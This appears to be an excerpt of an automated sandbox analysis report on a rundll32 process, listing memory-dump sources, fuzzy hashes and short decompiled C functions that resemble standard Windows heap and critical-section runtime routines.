                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c18922e1a56febf6cc9f44d0b7fa6c9e53ece4ec331c9a6ee0fdc6681f41adf5
                                                                                                                • Instruction ID: 62149692f6435f57e6e1446b26045fffafb6c41dddb33fbb4cbd6ba06faca585
                                                                                                                • Opcode Fuzzy Hash: c18922e1a56febf6cc9f44d0b7fa6c9e53ece4ec331c9a6ee0fdc6681f41adf5
                                                                                                                • Instruction Fuzzy Hash: 53D0A73110010053FE2D5B129C04B153251DBC4F8AF38006EF207599C1CFA4FD92E448
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044853CA(void* __ebx) {
                                                                                                                				intOrPtr _t7;
                                                                                                                				void* _t13;
                                                                                                                				void* _t14;
                                                                                                                				intOrPtr _t15;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t13 = __ebx;
                                                                                                                				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                                                                					E0441EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                                                                					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                                                                				}
                                                                                                                				if(_t15 != 0) {
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                                                                					return  *((intOrPtr*)(_t16 - 0x64));
                                                                                                                				}
                                                                                                                				return _t7;
                                                                                                                			}









                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                • Instruction ID: 9352604107ee3eb8ce8d85b79adc26e0ac6443a2de3ee9051fa54014b946e5b9
                                                                                                                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                • Instruction Fuzzy Hash: B9E0EC75944684ABDF12EB59C650F5EB7F5FB84B40F550459A4085B761CA74BD00CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044335A1(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                				void* _t6;
                                                                                                                				void* _t10;
                                                                                                                				void* _t11;
                                                                                                                
                                                                                                                				_t10 = __ecx;
                                                                                                                				_t6 = __eax;
                                                                                                                				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                                                                                					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                                                                                				}
                                                                                                                				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                                                                                					return E0441EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                				}
                                                                                                                				return _t6;
                                                                                                                			}







                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                • Instruction ID: cf4f318f9e0f7339ca6155187d0b75c475078701dd594d20ccfa1b02bc4eff8f
                                                                                                                • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                • Instruction Fuzzy Hash: FBD0C735551184D9DF51EF50C1147697771BB04B1AF5810DB9C4605652C335695AD601
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441AAB0() {
                                                                                                                				intOrPtr* _t4;
                                                                                                                
                                                                                                                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                				if(_t4 != 0) {
                                                                                                                					if( *_t4 == 0) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					return 0x7ffe0030;
                                                                                                                				}
                                                                                                                			}





                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                • Instruction ID: 68e4a2742c9589516036e2508d961c855ac756a69327179d9394e62d632b43ef
                                                                                                                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                • Instruction Fuzzy Hash: 13D0E935352E80CFDB16CF1DC955B1673A4BB45B84FC50491E901DBB65E62CE944CA00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0448A537(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                
                                                                                                                				return L04428E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                                                                			}



                                                                                                                0x0448a553

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440DB40() {
                                                                                                                				signed int* _t3;
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				_t3 = L04424620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                                                				if(_t3 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					 *_t3 =  *_t3 | 0x00000400;
                                                                                                                					return _t3;
                                                                                                                				}
                                                                                                                			}






                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0440AD30(intOrPtr _a4) {
                                                                                                                
                                                                                                                				return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                			}



                                                                                                                0x0440ad49

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044336CC(void* __ecx) {
                                                                                                                
                                                                                                                				if(__ecx > 0x7fffffff) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                                				}
                                                                                                                			}




                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044176E2(void* __ecx) {
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                                                					return L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                                                				}
                                                                                                                				return _t5;
                                                                                                                			}





                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04423A1C(intOrPtr _a4) {
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				return L04424620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                                                                			}




                                                                                                                0x04423a35

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04427D50() {
                                                                                                                				intOrPtr* _t3;
                                                                                                                
                                                                                                                				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                                                				if(_t3 != 0) {
                                                                                                                					return  *_t3;
                                                                                                                				} else {
                                                                                                                					return _t3;
                                                                                                                				}
                                                                                                                			}





                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E04432ACB() {
                                                                                                                				void* _t5;
                                                                                                                
                                                                                                                				return E0441EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                			}





                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                • Instruction ID: 392c5af3fe40ae80dcd8e358a2274d0536b257be961c7fc7b6f3ccbf29fd9887
                                                                                                                • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                • Instruction Fuzzy Hash: AEB01236C10440CFCF02EF40C610F197331FB00750F154495940127971C228BC01CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0449FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                				void* _t7;
                                                                                                                				intOrPtr _t9;
                                                                                                                				intOrPtr _t10;
                                                                                                                				intOrPtr* _t12;
                                                                                                                				intOrPtr* _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				intOrPtr* _t15;
                                                                                                                
                                                                                                                				_t13 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_t14 =  *[fs:0x18];
                                                                                                                				_t15 = _t12;
                                                                                                                				_t7 = E0444CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                				_push(_t13);
                                                                                                                				E04495720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                				_t9 =  *_t15;
                                                                                                                				if(_t9 == 0xffffffff) {
                                                                                                                					_t10 = 0;
                                                                                                                				} else {
                                                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                				}
                                                                                                                				_push(_t10);
                                                                                                                				_push(_t15);
                                                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                				return E04495720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0449FDFA
                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0449FE01
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0449FE2B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: d622c61d7082250b4dc6d7fd15aaab4b2071c378bf4432aa995644f003ead17f
                                                                                                                • Instruction ID: 15456363a7721e8c6f57996c31936206f6a3b515d2f86223c3f6c068116ddb40
                                                                                                                • Opcode Fuzzy Hash: d622c61d7082250b4dc6d7fd15aaab4b2071c378bf4432aa995644f003ead17f
                                                                                                                • Instruction Fuzzy Hash: FAF0C832240101BBFE211A46DC05E237F9ADB44730F250256F614555D1EA62BD2096A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%